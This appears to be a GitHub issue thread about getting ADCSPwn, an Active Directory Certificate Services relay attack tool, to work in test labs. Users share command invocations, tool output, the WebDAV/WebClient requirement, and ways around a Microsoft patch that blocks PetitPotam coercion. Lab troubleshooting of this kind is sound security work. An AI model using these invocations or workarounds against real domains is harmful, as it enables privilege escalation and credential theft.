Help for lab setup?

[7MinSec]

Hello there,

I'm SUPER excited to try this in the lab. I spun up a fresh Server 2019, joined to my test domain, and then followed this blog to install ADCS. All services appear to be good to go, and if I browse to http://adcs.my.domain/certsrv I get the ADCS page.

However, if I try to trigger ADCSPwn, I only get...

[i] Found 34 certificate templates
[i] Set ADCS web service as: adcs.my.domain
[i] Triggering authentication from target [dc.my.domain]

...and then that's it.

Are there some basic troubleshooting things I can do? Not sure where the disconnect is here.

Thanks,
Brian

[bats3c]

That is because ADCSPwn relies on WebDAV as described in issue #2

[salinnsilva]

ADCSPwn.exe --adcs barcelona12.dc.nova --remote 192.168.172.129 --output C:\Temp\cert_b64.txt

The local computer is not part of a domain or the domain cannot be contacted.
even with everything right and connected

[bats3c]

@salinnsilva please stick to issue #4 only with your problem please.

[j0nh4t]

I'm having the same issue even though WebClient service is running. Any tips troubleshooting?

Running as Domain User

PS C:\Tools> sc.exe query WebClient

SERVICE_NAME: WebClient
        TYPE               : 30  WIN32
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

PS C:\Tools> .\ADCSPwn.exe --adcs adcs.evilcorp.local

   _____  ________  _________   ___________________
  /  _  \ \______ \ \_   ___ \ /   _____/\______   \__  _  ______
 /  /_\  \ |    |  \/    \  \/ \_____  \  |     ___/\ \/ \/ /    \
/    |    \|    `   \     \____/        \ |    |     \     /   |  \
\____|__  /_______  /\______  /_______  / |____|      \/\_/|___|  /
        \/        \/        \/        \/                        \/

Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik -  TrustedSec

[i] Found 34 certificate templates
[i] Set ADCS web service as: adcs.evilcorp.local
[i] Triggering authentication from target (localhost)

[i] Using path \\workstation1@8080/7AWGI387CI\22Y53PGE8F\OCFDDCWS8W

Doesn't timeout, just hangs here. workstation1 is listening on 8080

On ADCS there are no new issued, pending or failed requests. I have no issues when exploiting with PetitPotam and ntlmrelayx so I think my ADCS is running and configured correctly.

[bats3c]

Yes i am having the same issue since patch Tuesday. It appears that MS have patched something which is preventing PetitPotam from triggering the authentication over WebDAV, i am currently working on a fix.

[qaxnb666]

I would like to know how did you solve this problem.

[0xAsh]

Yes i am having the same issue since patch Tuesday. It appears that MS have patched something which is preventing PetitPotam from triggering the authentication over WebDAV, i am currently working on a fix.

I believe MS hotfixed the original RPC calls that were disclosed by Topotam. I've had decent success utilizing Ly4k's Python implementation which introduces extra EfsRpc calls, might be helpful.

[V0lk3n]

Look this thread on twitter there is a workaround apparently : https://twitter.com/snovvcrash/status/1552937059614363648